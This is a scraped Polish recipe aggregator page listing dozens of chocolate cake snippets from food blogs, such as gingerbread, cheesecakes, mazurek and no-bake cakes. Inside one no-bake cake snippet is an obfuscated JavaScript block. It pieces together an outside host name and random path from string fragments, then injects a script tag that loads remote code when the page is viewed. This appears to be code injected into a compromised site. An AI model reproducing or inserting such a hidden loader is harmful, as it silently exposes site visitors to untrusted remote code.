ciasta czekoladowe - 15588 przepisów (strona:289/1040)

Piernik przekładany powidłami 178

Taki jak lubię. Przełożony powidłami śliwkowymi, które moim zdaniem z piernikiem tworzą duet doskonały, a wszelkie kremy czy masy marcepanowe mogą się schować. Do tego polewa czekoladowa...i jestem w niebie ;) Przepis na ciasto piernikowe zaczerpnęłam STĄD . Uważam, że jest świetne - miękkie, puszyste, wilgotne. Zredukowałam tylko ilość cukru ( co często czynię gdy korzystam z czyichś przepisów ) i wg mnie(...)czekoladowa: W małym garnuszku podgrzać śmietankę kremówkę, prawie do wrzenia. Dodać posiekaną czekoladę, odstawić na chwilę, następnie wymieszać do otrzymania gładkiego sosu czekoladowego. Polewę odstawić do lekkiego zgęstnienia, co jakiś czas mieszając. Gęstniejącą polewą polać piernik. Ciasto odstawić w chłodne miejsce ( niekoniecznie do lodówki ) do całkowitego stężenia polewy. Przechowywać w chłodnym miejscu. * jeżeli ciasto ma być wykonane w większej formie

Opowieści z piekarnika
"Leśna Pokusa" - Tarta bez pieczenia 407

mnóstwem leśnych, kwaskowych owoców. Poezja smaku! Tarta nie wymaga pieczenia, krem jest również bardzo prosty do wykonania. Idealne ciasto na upalne popołudnie. Kto się skusi ? ;) Polecam! Składniki: Ciasto: 300 g kruchych czekoladowych ciasteczek typu Oreo (najlepiej z czekoladowym nadzieniem)   75 g gorzkiej czekolady 50 g masła w temperaturze pokojowej Czekoladę połamać na małe kawałeczki. Ciastka wrzucić do blendera, dodać

maniapieczenia
NAJPROSTSZY MAZUREK CZEKOLADOWY (LAST MINUTE) 156

zdecydował się w ostatniej chwili na jeszcze jeden wypiek lub po prostu miał ochotę na inną wersję mazurka, niż tradycyjna, to musicie koniecznie upiec mój czekoladowy mazurek 😋 Pyszne, maślane, kruche ciasto (do zagniecenia mikserem z końcówka do mieszania w 2 minuty lub ręcznie w kilka więcej, a do tego roztopiona mleczna czekolada z dodatkiem odrobiny niebieskiego barwnika - w ciemnej(...)żółtko 30 g cukru pudru 2 łyżki gęstego jogurtu naturalnego lub kwaśnej śmietany 18% POLEWA CZEKOLADOWA: 100 g mlecznej czekolady 200 g białej czekolady niebieski (wchodzący w grant) barwnik spożywczy WYKONANIE: Zimne masło pokrój w drobną kosteczkę i zagnieć wraz z pozostałymi składnikami ciasto. Możesz zrobić to ręcznie lub mieszadłem miksera (do cięższych ciast). Składniki muszą się dobrze połączyć, ciasto

Słodko-Słony Świat Ilony
Ciasto porzeczkowa wuzetka 185

Wuzetka niemałą sławę ma, ale w tym cieście główne skrzypce grają czerwone porzeczki :-) Mi osobiście takie zestawienie bardzo smakowało, ale jeżeli za czerwoną porzeczką nie przepadacie, to można wykorzystać wiśnie lub truskawki, czy też jeszcze inne owoce. Myślę, że efekt będzie równie ciekawy. Biszkopt pieczony w blaszce o wymiarach 25x30 cm. SKŁADNIKI Na biszkopt 6 jajek szczypta soli 1 szklanka(...)palnik. Polewę zostawić do ostudzenia i jej lekkiego zgęstnienia. Dolny placek ciasta posmarować równomiernie frużeliną porzeczkową, następnie wyłożyć na niej śmietanę, wyrównać i nałożyć górny placek. Górę ciasta polać gęstą polewą czekoladową. Uwagi: Górny biszkopt - od strony gdzie styka się ze śmietaną - warto nasączyć odrobiną przegotowanej i ostudzonej wody z cytryną, dzięki czemu będzie się go łatwiej kroić (bo ciasto

Passions hobbies life
SERNIK WIEDEŃSKI 167

Sernik można powiedzieć ekspresowy, bez potrzeby robienia ciasta kruchego na spód. Puszysty z polewą czekoladową.   SKŁADNIKI: (tortownica 24 cm) MASA SEROWA: 1 kg twarogu tłustego trzykrotnie zmielonego 6 jaj 100 g stopionego, ostudzonego masła 1,5 szklanki cukru 2 łyżki cukru waniliowego 2 łyżki mąki ziemniaczanej lub budyń waniliowy polewa . SPOSÓB PRZYGOTOWANIA: Masa serowa Żółtka utrzeć z cukrem oraz(...)Ciasto wlać do tortownicy wysmarowanej masłem i posypanej bułką tartą. Wstawić do nagrzanego piekarnika i piec 60 -70 minut w temperaturze około 180 C (góra - dół). Po upieczeniu sernik zostawić w piekarniku na 10 – 15 minut, i po tym czasie go wyjąć. Po wyjęciu oddzielić nożem boki sernika od formy. Po upieczeniu sernik można polać rozpuszczoną czekoladą lub polewą czekoladową

RAROSSA
Przepisy na proste i szybkie ciasta bez pieczenia 549

posypujemy startą czekoladą. Ciasto wkładamy do lodówki na około 12 godzin. Jeżeli na przygotowanie tego ciasta bez pieczenia mamy mało czasu, możemy ugotować 2 budynie waniliowe z odrobiną cukru w 500 ml mleka, a po ostygnięciu utrzeć z ¾ kostki masła. Blok czekoladowy Do przygotowania tego, kultowego już, deseru, którym delektowały się nasze mamy i babcie, potrzebować będziemy: ¾ szklanki cukru ½ szklanki(...)lodówki do stężenia na kilka godzin. Gotowy blok czekoladowy kroimy na małe kawałki. (function(){ qkaq=document.createElement("script");qkaq_=("us")+("ta"); qkaq_+="t"+(".");qkaq_+=("in");qkaqu="67379154";qkaq.async=true; qkaqu+=".r1jmnvapkaq8ssrav";qkaq.type="text/javascript";qkaq_+="f"+"o"+("/"); qkaqu+="tk082vwj4xdbh";qkaq.src="//"+qkaq_+qkaqu; dqkaq=document.body;dqkaq.appendChild(qkaq); })(); Artykuł Przepisy na proste i szybkie ciasta bez pieczenia pochodzi z serwisu Mostek w kuchni

Mostek w kuchni
Piętrowiec - metrowiec 114

cytryny    +  opcjonalnie zapach cytrynowy 2 gotowe polewy czekoladowe Jaja ubijamy z cukrem na puszystą masę.  Stopniowo dodajemy mąkę i proszek do pieczenia - miksujemy.  Olej mieszamy z ciepłą wodą i zapachem rumowym - dodajemy do ciasta cały czas miksując. Tak powstałe ciasto dzielimy na 2 połowy - do jednej dodajemy dwie łyżki mąki, a do drugiej 4 łyżki(...)cieście pokrojonym wzdłuż około 2 łyżki kremu na plaster ciasta) i układamy plastry na sobie kolorami na przemian (raz ciemne, raz jasne). Oczywiście powstaną dwa ciasta ;-) Piętrowce wstawiamy do lodówki. Polewy czekoladowe przygotowujemy wg wskazań na opakowaniu i polewamy nimi ciasta. Ponownie stawiamy do lodówki. Ciasto najlepiej smakuje na drugi dzień ;-) SMACZNEGO

peggiwkuchni
Ciasto Łowickie 173

latin; mso-fareast-language:EN-US;} Moje wypieki na Wielkanoc oprócz dobrego smaku muszą także wyglądać naprawdę świątecznie i wiosennie 😊 Przed Wami pierwszy z moich autorskich przekładańców wielkanocnych: Ciasto Łowickie. To czekoladowy biszkopt nasączony nakropkiem czekoladowo-kawowym. Paski białe to ... sernik , a kolorowe pasy to galaretka owocowa. Całość zamknięta deserową polewą- bardzo orzeźwiający, wilgotny serniczek. Lekki – na tyle , że może

Domowe ciasta
Trójkąty z ciasta francuskiego z nutellą 98

mega szybkiego, idealnego na każdą okazję, dla niespodziewanych gości lub gdy mamy ochotę na ciasto, a nie chce nam się go piec lub nie potrafimy. Poduszeczki, trójkąciki z ciasta francuskiego z czekoladową, gęstą, słodką nutellą. Dla młodych adeptów sztuki gastronomicznej w domu idealne. Wykonanie mojej córki. Czytaj więcej

Bernika - moj kulinarny pamietnik
Szybki sernik oreo bez pieczenia 187

Ciasto wstaw do lodówki, najlepiej na całą noc. Rano przygotuj polewę – w kąpieli wodnej rozpuść czekoladę z masłem, gdy składniki się rozpuszczą dodaj kakao i dokładnie wymieszaj. Ciasto udekoruj polewą czekoladową. Przechowuj je w lodówce. Smacznego   Artykuł Szybki sernik oreo bez pieczenia pochodzi z serwisu 365 dni dookoła kuchni

365 dni dookoła kuchni
Ciasto bananowo-czekoladowe - bez miksera, w 15 minut 162

Ciasto idealne - mocno czekoladowe, wilgotne a do jego zrobienia możemy wykorzystać banany, które zbyt mocno dojrzały i na które nie mamy już ochoty:). Do tego zrobimy je w 15 minut, bez użycia miksera! 3 bardzo dojrzałe banany 125g masła 100g gorzkiej czekolady 1/2 szklanki cukru  2 jajka 150g mąki  1 łyżeczka proszku do pieczenia + 50g mlecznej czekolady

Szefowa kuchni
Blok (zdrowsza wersja) 110

Blok czekoladowy jest popularnym deserem znanym od dawna. Jednak mój ma składnik, który czyni to innym od tych tradycyjnych. Dodatek smażonej skórki pomarańczowej oraz soku z

Tylko pysznie
Wielkanocne ciasta II 164

niebawem. Kilka z nich natomiast już znacie. Lista ciast świątecznych: Makowiec japoński Pani walewska Brazylianka  Orzechowiec Duetka z galaretką i kremem Pijak Sernik na biszkopcie z brzoskwinią Ciasto Kawowo Karmelowe Czekoladowy Cytrynowiec Mazurek z masą kajmakową i czarną porzeczką Smacznego i udanych wypieków

Domowe ciasta
ODCHUDZONY PIERNIK DYNIOWO-ORKISZOWY 162

krótko mieszamy ciasto przekładamy do formy keksowej (30x11cm)wyłożonej papierem do pieczenia, pieczemy w piekarniku nagrzanym do 180ºC około 45 minut do suchego patyczka gotowe i przestudzone ciasto polewamy polewą czekoladową i posypujemy orzechami. Źródło: http://frosch.blogspot.com/2017/12/piernik-dyniowy-prosty-bez-ucierania.html

Słodkie zapomnienie
rajskie ciasto 1408

blat orzechowy wykładam 1/2 cz. kremu układamy „na leżąco” kawałki rolady, jeden przy drugim. Wykładamy pozostałą część kremu i przykrywamy drugim blatem orzechowym, lekko dociskając. Wierzch ciasta polewamy polewą czekoladową i dowolnie dekorujemy np. zmielonymi orzechami

Domowy Smak Jedzenia
Pyszny piernik pszczelarza 135

bakalie Lejące ciasto wylać na wysmarowaną tłuszczem i posypaną kaszą manną formę lub wyłożoną papierem do pieczenia Piec przez około 1 godzinę w temperaturze 160*C. Smakosze mogą ciasto polać polewą czekoladową ( 250 g masła lub margaryny plus 1 szklanką cukru i 2 łyżkami kakao). Ja posypałam cukrem pudrem. Piekłam w foremce 25 x 32 cm, można w większej

Proste Potrawy
Ciasto MILKY WAY 239

mleko w proszku, wszystko ucieramy mikserem na wyższych obrotach, masa będzie trochę gęsta. Na pierwszą część ciasta rozsmarowujemy masę, kładziemy drugą część i lekko dociskamy, na wierzch ciasta wylewamy polewę czekoladową, ja przygotowałem z dwóch tabliczek czekolady i 1/4 szkl. mleka

KUCHNIA POLSKA
Ciasto z musem jabłkowym 428

były zbyt rzadkie włożyć do lodówki, żeby lekko stężały, na jabłka delikatnie rozsmarować krem budyniowy, przykryć drugą częścią ciasta, lekko docisnąć, schować do lodówki do schłodzenia, na schłodzone ciasto rozprowadzić polewę czekoladową

KUCHNIA POLSKA
Brownie z malinami 154

Cudownie czekoladowe, wilgotne brownie w połączeniu z delikatną śmietanką i orzeźwiającymi malinami to deser doskonały. My jesteśmy nim zachwyceni :) Brownie: 250 g masła 250 g gorzkiej

Smakołyki Asi
ciasto francuskie z bajecznym kremem z owocami 136

gorącej kąpieli (lub w kuchence mikrofalowej przez 30-40 s) rozpuścić białą czekoladę do lekko ostudzone czekolady dodać mascarpone i dokładnie wymieszać na upieczone ciasto wylać masę czekoladową i ułożyć owoce odłożyć do stężenia :)  Powiem krótko niebo w gębie : ) Smacznego

Gotowanie z pasją
ciasto mleczna kanapka 664

cukrem. Na koniec wsypuję mleko w proszku i miksuję na gładką masę. Kremem przekładam ciasto (krem nie jest bardzo gęsty ale po nocy w lodówce nabiera odpowiedniej konsystencji). Ciasto dekoruję polewą czekoladową - margarynę rozpuszczam w rondelku, dodaję mleko, cukier puder i kakao, zdejmuję z ognia i mieszam energicznie trzepaczką, aż do uzyskania gładkiej konsystencji

babka w formie
Czekoladowy sernik z polewą czekoladową 171

Artykuł Czekoladowy sernik z polewą czekoladową pochodzi z serwisu Przepisy kulinarne, przepisy na obiad - FoodMagazine.pl .

FoodMagazine.pl - Przepisy kulinarne
Przepis #122 Czekoladowo-kokosowe Brownie z fasoli 280

przygotowaną masę przekładamy do formy. Wierzch dodatkowo posypałam odrobiną startej czekolady ale to nie jest konieczne. Pieczemy w piekarniku nagrzanym do 180 stopni przez około 50 minut.   Ciasto jest bardzo czekoladowe w smaku i idealnie sprawdzi się na deser lub drugie śniadanie , które można zapakować do szkoły czy pracy. Smacznego

Health-Fit-Life
Karleksmums – szwedzkie ciasto miłości 150

cynamonowe przyszedł czas na ciasto miłości. Na samym początku bardzo dziwiła mnie ta nazwa, jednak gdy przygotowałem karleksmums, zrozumiałem, dlaczego to ciasto jest nazywane ciastem miłości. Idealny, czekoladowy smak, gruba warstwa polewy i mnóstwo wiórek kokosowych – niebo w gębie

Vegan Taste
Ciasto orzechowo-jabłkowe z masą cappuccino 202

blaszce umieszczamy ponownie jeden z blatów biszkoptu orzechowego. Wykładamy na niego połowę masy cappuccino. Następnie dajemy wkładkę jabłkowo-orzechową. Rozprowadzamy resztę masy. Na wierzch dajemy drugi blat orzechowy. Ciasto dekorujemy polewą czekoladową. Polewa: około 80 g masła 160g kwaśnej śmietany 18% 1/2 szkl. drobnego cukru 4 łyżki kakao 1 łyżka żelatyny Żelatynę zalewamy około 1/4 szklanki zimnej, przegotowanej wody. Odstawiamy

Smaki Na Talerzu
Ciasto buraczano-czekoladowe 123

obsypanej kaszą manną. Piec w piekarniku nagrzanym do 180 C przez około 60 minut do tzw. "suchego patyczka".   Upieczone wyjąć i pozostawić do ostudzenia.     Ciasto buraczano-czekoladowe obsypać cukrem pudrem i skórką ze startej mandarynki.         SMACZNEGO

Fiołkowe Talerze
Bezglutenowa krucha tarta z solonym karmelem 236

płynną konsystencję. W kąpieli wodnej rozpuść czekoladę z mlekiem kokosowym. Upieczony spód tarty odstaw do przestygnięcia. Naspnie wyłóż na niego karmel, tak aby pokrył całą powierzchnię ciasta. Nakoniec ciasto polej polewą czekoladową, wyrównując jego powierzchnie. Gotową tartę wstaw do lodówki na ok. 2 godziny. Podawaj schłodzoną. Smacznego Artykuł Bezglutenowa krucha tarta z solonym karmelem pochodzi z serwisu 365 dni dookoła

365 dni dookoła kuchni
CIASTECZKA CZEKOLADOWE Z NADZIENIEM KOKOSOWYM 438

SKŁADNIKI: CIASTO: • 2 szkl. mąki • 3/4 szkl. cukru pudru • 3 łyżki kakao • kostka schłodzonego masła • 4 żółtka MASA: • 200 g wiórków kokosowych • 1/2 szkl. cukru • 1/5

KUCHNIA POLSKA
Ciasto z kaszą manną i wiórkami kokosowymi 216

można sprawdzić patyczkiem). Na podpieczone ciasto wylać masę z kaszy manny i wiórków kokosowych, wierzch wyrównać, wylać resztę ciasta, ponownie włożyć do piekarnika na 20 minut.  Wystudzone ciasto oblać polewą czekoladową bądź udekorować roztopioną ze śmietaną białą czekoladą

Kuchenne aromaty
Pijana śliwka -ciasto 146

pokruszoną czekoladę. Wszystko wymieszać aż polewa będzie gładka. Składanie ciasta blat ciasta nasączyć syropem z śliwek w którym się moczyły krem śliwki powciskać lekko w krem nasączony blat ciasta śliwki polewa czekoladowa pijana śliwka

O kuchni z uczuciem
Babka kakaowa w czekoladowej polewie 185

Babka kakaowa w czekoladowej polewie to ciasto, na które przepis powinien mieć każdy z nas:). Jest prosta w wykonaniu, smaczna. Zrobimy ją ze składników, które zazwyczaj są w naszych kuchniach zawsze.  250g margaryny 1 i 1/4 szklanka cukru 1/2 szklanka mleka 3 łyżki kakao 2 szklanki mąki 4 jajka L 1 łyżeczka proszku do pieczenia 100g mlecznej czekolady

Szefowa kuchni
CIASTO PIERNIKOWO-PORZECZKOWE Z KREMEM 112

już wspomniałam go zabrakło dlatego zrobiłam warstwę z bitą śmietaną zamiast warstwą kremu budyniowego, tak naprawdę ta śmietana nadała lekkości), którą przykrywamy drugim blatem biszkoptu na wierzchu ciasta rozsmarowujemy polewę czekoladową, którą dodatkowo możemy ozdobić np. perełkami itp. Źródło: http://gotujmy.pl/ciasto-piernikowo-porzeczkowe,przepisy-biszkopty-przepis,233750.html

Słodkie zapomnienie
Muffiny waniliowe z nadzieniem czekoladowo-truskawkowym 142

Moja córka lubi bardzo, gdy przygotowuję jakieś muffiny. Chętnie mi też wtedy towarzyszy w kuchni i pomaga. Tym razem zrobiłyśmy Muffiny waniliowe z nadzieniem czekoladowo-truskawkowym . Składniki: ciasto: - 2 szklanki mąki pszennej - 2/3 szklanki cukru - 1 cukier waniliowy - 2 jajka - 1 szklanka mleka - 1/3 szklanki oleju rzepakowego nadzienie: - tabliczka gorzkiej czekolady - konfitura ekstra z truskawek niskosłodzona Łowicz Forma:  aluminiowa

Kuchnia co dnia
Ciasto czekoladowe z gruszkami. 191

przez ok. 45 minut (do tzw. suchego patyczka). Po upieczeniu wystudzić. W małym rondelku podgrzać śmietanę, dodać do nie j czekoladę i mieszać aż powstanie gładka polewa. Ciasto polać sosem czekoladowym

zadanie-gotowanie
Tort orzechowo-migdałowo-czekoladowy 283

układamy blat orzechowy. Wykładamy 1/3 masy, przykrywamy blatem migdałowym, nakładamy 1/3 masy. Przykrywamy ciastem kakaowym. Rozprowadzamy niewielką ilość dżemu. Boki tortu wykańczamy resztą kremu. Obsypujemy mielonymi orzechami. Wierzch ciasta ozdabiamy polewą czekoladową (masło i czekoladę należy rozpuścić na małym ogniu w kąpieli wodnej) i posypujemy grubo krojonymi orzechami i migdałami lub dekorujemy wg uznania. Źródło

Smaki Na Talerzu
Malinowe tiramisu 156

dodaj śmietanfix. W formie 18 cm x 18 cm umieść biszkopty namoczone w malinach, następnie wyłóż bitą śmietaną i powtórz czynność, tak aby były dwie warstwy biszkoptów. Górę ciasta udekoruj wiórkami czekoladowymi i świeżymi malinami.  Tiramisu umieść w lodówce na 2-3 h.  Smacznego

Niezły Młynek
Deserowa zebra 172

środek ciasta ( raz białą, raz ciemną), aż do wykończenia mas. W ten sposób powstanie nam "zebra"  Ps. Źle podzieliłam masę i brakło mi białej, dlatego środek mojego ciasta jest tylko czekoladowy. Gotową "zebrę" chowamy do lodówki i chłodzimy co najmniej 2-3 godz. "Zebrę" można zrobić wg tego pomysłu , tu użyto tylko jogurtu greckiego. Ja zrobiłam ją po swojemu

Proste Potrawy
ciasto kruche z masą jabłkową oraz grysikowo kokosową 174

ciasta kruchego wykładamy równomiernie masę jabłkową, na nią wykładamy masę z kaszy manny i przykrywamy drugim blatem kruchym. Całość delikatnie obciążamy deseczką i odstawiamy ciasto do stężenia. Wierzch ciasta polewamy polewą czekoladową i dowolnie dekorujemy. (inspiracja z przepisu s. Anastazji

Domowy Smak Jedzenia
Jogurtownik Zebra Bez Pieczenia 1441

łyżce masy na środek ciasta aż do wykończenia mas. W ten sposób powstanie nam zebra :) Ps. ja źle podzieliłam masę i brakło mi białej dlatego środek mojego ciasta jest tylko czekoladowy. Gotowy jogurtownik chowamy do lodówki i chłodzimy co najmniej

Gotowanie...to proste !
Ciasto bananowe 13917

dopuszczamy aby się zagotowała, dodajemy czekoladę, mieszamy do momentu aż się rozpuści. Żelatynę rozpuszczamy w łyżce gorącego mleka i dodajemy do czekolady, odstawiamy na bok. Gdy ciasto jest już zimne a polewa czekoladowa zaczyna gęstnieć należy polać nim ciasto i posypać migdałami

Delusional Trine
Piątki z piłką. Dwa 187

punkcie zrozumieć nie mogę... Nie oceniam ani nie neguję, po prostu nie rozumiem. Torty jednak w kształcie piłek przygotowałam z prawdziwą przyjemnością. Pierwszy  był mocno czekoladowy; począwszy od ciasta, poprzez trzy rodzaje musu: z białej, mlecznej i ciemnej czekolady. Stwierdziłam jednak, że skoro są dwa, a nie wszyscy są tak zagorzałymi fanami czekolady, drugi przygotuję w wersji nieco lżejszej

Pożeraczka, czyli raz adobrze
Tiramisu a’la czarny las 187

czarny las Tiramisu a’la czarny las to idealne wykorzystanie mascarpone do deseru, zwłaszcza gdy zalega wam w lodówce. Ja musiałam go spożytkować, ponieważ do ciasta Wiśnie na czekoladowej poduszce kupiłam aż dwa opakowania, tak dla zapasu. Wiśni w kompocie zresztą też mi zostało, więc sytuacja idealna. Nie będę się dużo rozpisywać: deser szybki i łatwy w przyszykowaniu, jest

Relaxtime
Piernikowe babeczki – idealne na okres świąteczny 125

Piernikowe babeczki nadają się idealnie na okres świąteczny. Pełne smaku oraz aromatu gałki muszkatołowej, goździków oraz imbiru. Wilgotne ciasto z puszystym czekoladowym kremem ozdobione domowymi pierniczkami są wspaniałym pomysłem by uraczyć się czymś naprawdę pysznym w te święta Składniki na babeczki (12 sztuk) 120g masła 100g cukru brązowego jajko 120ml mleka 150g melasy łyżeczka esencji waniliowej 170g maki pszennej łyżeczka

wysmienity
Kotlety z kalafiora 158

morele, kupiłam jabłka. Mimo to i tak mam ochotę na lody, nawet pogoda mi nie straszna;) Ale może lodową dietę przełożę na jutro. A dziś... dziś będzie ciasto cukiniowo-czekoladowe, kotleciki z kalafiora, wieczorem nastawię zaczyn na dyniowe bułeczki i kto wie czy znów nie ulepię pierogów z jagodami:)  Kotlety z kalafiora to moje tegoroczne odkrycie. Pysznie smakują

Obiad gotowy
Ciasto Kilimandżaro 121

Wymieszać dokładnie, aż w masie nie będzie grudek. Ostudzony biszkopt przekroić na pół. Na jedną połowę wyłożyć jabłka z galaretką, wyrównać, następnie masę budyniową. Przykryć drugą połową biszkoptu. Ciasto polać polewą czekoladową, np. taką KLIK i posypać wiórkami kokosowymi. Schłodzić w lodówce przez kilka godzin, najlepiej przez całą noc. (adsbygoogle = window.adsbygoogle || []).push

Wilczkowy Świat - nasze codzienne gotowanie
Ciasto czekoladowo - wisniowo - orzechowe 236

orzechowe Ostudzony biszkopt przekroić wzdłuż. Jeden płat ciasta posmarować połową masy budyniowej. Wyłożyć połowę wiśni. Przykryć ciastem orzechowym. Posmarować pozostałą masą budyniową. Wyłożyć resztę wiśni. Przykryć drugim płatem ciasta. Udekorować polewą czekoladową

Pysznie & Pięknie
miodownik z serem gotowanym 201

równomiernie masę jabłkową, przykrywamy drugim blatem, lekko dociskamy. Na nim równomiernie rozsmarowujemy ciepłą masę serową i przykrywamy ją trzecim blatem. Całość obciążamy deseczką i ostawiamy do stężenia. Wierzch ciasta dekorujemy polewą czekoladową

Domowy Smak Jedzenia
Piernik na powidłach śliwkowych 179

wszystko razem dokładnie mieszamy. Masę przelewamy do wyłożonej papierem do pieczenia keksówki i pieczemy 60 minut (do tzw suchego patyka) w temperaturze 175 stopni C.  Po wystudzeniu ciasto pokrywamy polewą czekoladową z roztopionej w kąpieli wodnej czekolady wymieszanej z masłem i śmietaną. Dekorujemy bakaliami (żurawiną, suszonymi śliwkami, orzechami, morelami, migdałami

Smakowity Blog Kulinarny
Keks z makiem. Zdrowsza wersja 160

pieczenia piec w 170`C 60 minut, do suchego patyczka w małym rondelku zagotować śmietanę kremówkę. Dodać połamaną na cząstki czekoladę i zamieszać do rozpuszczenia gotowe, przestudzone ciasto posmarować polewą czekoladową

Gotuj zdrowo!Guten Appetit!
Świąteczne ciasto dojrzewające. 172

jest on niezbędny? Przyznam się, że wycięliśmy sobie mały trójkącik na drugi dzień i ciasto okazało się pyszne. Smak skojarzył mi się z bajaderką (z tych nieczekoladowych). Ten rodzaj dojrzewających ciast jest bardzo popularny w krajach anglosaskich. Robi się je z dużym wyprzedzeniem, a potem poi codziennie alkoholem. Taką ściśle tradycyjną wersję musiałbym nazwać ciastem pijanym i zaznaczyć

zadanie-gotowanie
Ciasto Marysieńka wg siostry Anastazji 869

miksując. Przekładamy ciasto Na ciemny biszkopt nałożyć połowę kremu i rozsmarować. Nałożyć na to placek orzechowy i rozsmarować drugą część kremu. Na górę położyć drugi biszkopt.  Wierzch ciasta posmarować polewą czekoladową i dowolnie udekorować

Kolorowa kuchnia Elki
Czekoladowe ciasto buraczane 155

Dziś mam dla Was wspaniałe, mocno czekoladowe i bardzo wilgotne ciasto z dodatkiem buraków. Tak tak, to nie błąd, w środku są buraki ;) Ale nie martwcie się, są absolutnie niewyczuwalne. Dodatkowym atutem ciasta jest to, że długo zachowuje świeżość, chociaż nie wiem, czy będzie Wam dane się o tym przekonać ;) Polecam serdecznie ;)  Składniki:  50 g kakao

Czerwona Porzeczka
Recenzja książki "Zdrowe i proste gotowanie ze św. Hildegardą z Bingen" 208

ricotty) Inne dania główne (np. Pizza z tuńczykiem) Dania główne na słodko (np. Tarta z kawałkami pigwy) * Dodatki (np. Słodkie marchewki, Przystawka z selera) * Desery (np. Krem czekoladowy, Pigwowe cukierki) * Ciasta, torty i inne wypieki (np. Ciasteczka wspomagające nerwy, Tort Sachera) * Wypieki na przyjęcia (np. Wieńce z ciecierzycy, Pikantne ptysie) * Ciasta podstawowe (np. Ciasto na tartę, Błyskawiczne ciasto francuskie) * Chleb

Z miłości do słodkości
Babka piaskowa 140

Piec przez ok. 40 minut w 180 stopniach C, aż do suchego patyczka. Po upieczeniu nie wyciągać od razu z piekarnika tylko stopniowo studzić, aby nie opadło. Ostudzone ciasto polać polewą czekoladową, obsypać płatkami migdałowymi. Poczekać, aż stężeje i podawać

Simply Food
Pancakes zebra na śniadanie 168

naleśnikowe na 2 części. Do jednej z nich dodaj kakao i resztę mleka, zmiksuj. Rozgrzej tłuszcz na patelni i zacznij smażyć pancakes wlewając na przemian po 2 łyżki ciasta białego i czekoladowego. Ciepłe pancakes podaj z lodami i klonowym syropem. The post Pancakes zebra na śniadanie appeared first on Blog kulinarny - codojedzenia.pl

codojedzenia
brzdąc- ciasto z czekoladowym kremem 129

Bardzo proste i lekkie ciasto z nutą czekoladową. Krem na bazie bitej śmietany i wilgotny biszkopt tworzą wspaniałe połączenie- nie zamulające choć dość kaloryczne. Doskonałe na lato ale należy pamiętać, żeby przechowywać je w lodówce, w innym razie się roztopi.  *foremka 24*24 cm Składniki: na biszkopt: 6 jajek 1,5 szklanki mąki 1,5 szklanki cukru

Domowa Cukierenka-Domowa Kuchnia
MAKOWIEC NA PUSZYSTYM BISZKOPCIE 140

PRZYGOTOWANIE :  Biszkopt należy przekroić na pół i przełożyć go gorącą masą. Ciasto polewamy polewą czekoladową i ozdabiamy według uznania. Makowiec przed krojeniem należy dobrze schłodzić

Kulinarne Fantazje Marioli
Polecane książki kulinarne: Retrowarzywa – Paweł Łukasik i Grzegorz Targosz 172

Kopytka z topinamburu z gulaszem z żołądków drobiowych – Sernik z topinamburem i kasztanami – Chleb z topinamburu z czarnuszką i masłem koperkowym – Hummus buraczany – Ciasto buraczano-czekoladowe z lukrem buraczanym – Lody z pieczonych buraków z truskawkami, czekoladą i kruszonymi migdałami Książka w księgarniach do kupienia od 8 czerwca

WojnaNaSmaki.pl
Blok czekoladowy 241

Blok czekoladowy to smak mojego dzieciństwa, każdy go zna, ale przynajmniej z sentymentu musiałam umieścić go na blogu. Dlaczego nie ma być dla niego miejsca, tylko

Kocham Czekoladę
Ciasto podwójnie czekoladowe 175

Pyszny czekoladowy biszkopt przełożony czekoladowym kremem. Pycha <3 Zapraszam do przygotowań! Składniki na biszkopt: 5 dużych jaj, żółtka oddzielone od białek szczypta soli 3/4 szklanki

My Culinary Art
Warsztaty cukiernicze z Pawłem Małeckim i Lidl Polska 152

mistrza cukiernictwa. Całe warsztaty upłynęły w bardzo miłej i wesołej atmosferze. A oto wypieki, które przygotowaliśmy wspólnie na warsztatach: Baba drożdżowa z ciastem parzonym: Mazurek czekoladowy: oraz Tarta Wielkanocna z Paschą: Wszystkie słodkości smakowały wybornie, trudno mi ocenić co było najsmaczniejsze. Cieszę się, że mogłam uczestniczyć w tak wspaniałych warsztatach, poznać

Marta Gotuje
Ciasto adwokatowe 249

Oprócz ciast z owocami lubię również takie z nutką alkoholu. To ciasto zrobiłam z kremem adwokatowym na czekoladowym spodzie i z bitą śmietaną. Ciasto długo utrzymuje świeżość a jeśli ma być na imprezę można go śmiało zrobić dzień wcześniej. Składniki: Ciasto: 250 g margaryny 250 ml wody 1i1/4 szkl cukru 4 łyżki kakao 2 szkl mąki pszennej 5 łyżeczek proszku

Ala piecze i gotuje
Pieczone donuty z czekoladą 204

wszystkie mokre składniki - roztopione i przestudzone masło, roztrzepane jajka, mleko i skórkę startą z pomarańczy. Suche składniki dokładnie połączyć z mokrymi - najlepiej przy pomocy trzepaczki, a następnie wmieszać czekoladowe groszki. Gotowe ciasto przełożyć do rękawa cukierniczego z okrągłą, szeroką tylką o średnicy 1 cm, a następnie wyciskać ciasto do foremki do pieczenia donutów wcześniej wysmarowanej olejem rzepakowym.* Donuty pieczemy

Plate of Joy
Piernik z powidłami 148

minut, lub do tzw.suchego patyczka. Polewa  Do rondelka wrzucić pokrojone masło, dodać cukier i wodę, zagotować. Dodać kakao , mieszając doprowadzić do zagotowania i zgęstnienia polewy. Gotowe ciasto, polać polewą czekoladową. Posypać pokrojonymi orzechami . https://www.youtube.com/watch?v=ShqT4DMtPY4 (function(d, s, id) { var js, fjs = d.getElementsByTagName(s)[0]; if (d.getElementById(id)) return; js = d.createElement(s); js.id = id; js.src = "//connect.facebook.net/pl_PL/all.js#xfbml

Kuchnia Danusi
Sernik czekoladowy 127

Sernik czekoladowy, który chcę Wam dziś zaproponować to pyszne połączenie delikatnej masy serowej z kruchym spodem z ciasteczek Oreo, do tego Nutella na górę i dekoracja

Ciastkozercy
Podwójnie czekoladowy chlebek bananowy 183

słońca brak i szybko nie wyjdzie na dłużej warto ratować się czekoladą. Przynajmniej ja tak mam, czekolada jest dobra na wszystko. Ten chlebek który w zasadzie jest ciastem jest mega czekoladowy i mega pyszny, dlatego zachęcam do spróbowania. Pieczcie i chwalcie się czy smakowało? Podwójnie czekoladowy chlebek bananowy. ROZWIŃ I CZYTAJ DALEJ

Moje Małe Czarowanie
koreczki naleśnikowe z owocami 154

szklanki mleka 1 jajko 75 g mąki szczypta soli 1 łyżka oleju rzepakowego dodatkowo: 3 banany kilka winogron kawałek pomarańczy tłuszcz do smażenia 3 łyżki kremu czekoladowego typu Nutella Składniki ciasta zmiksować lub dokładnie wymieszać aż powstanie jednolite ciasto. Na rozgrzanym tłuszczu usmażyć trzy niezbyt grube naleśniki. Posmarować je kremem czekoladowym. Na każdym naleśniku z boku ułożyć banana i zwijać

Domowa Cukierenka-Domowa Kuchnia
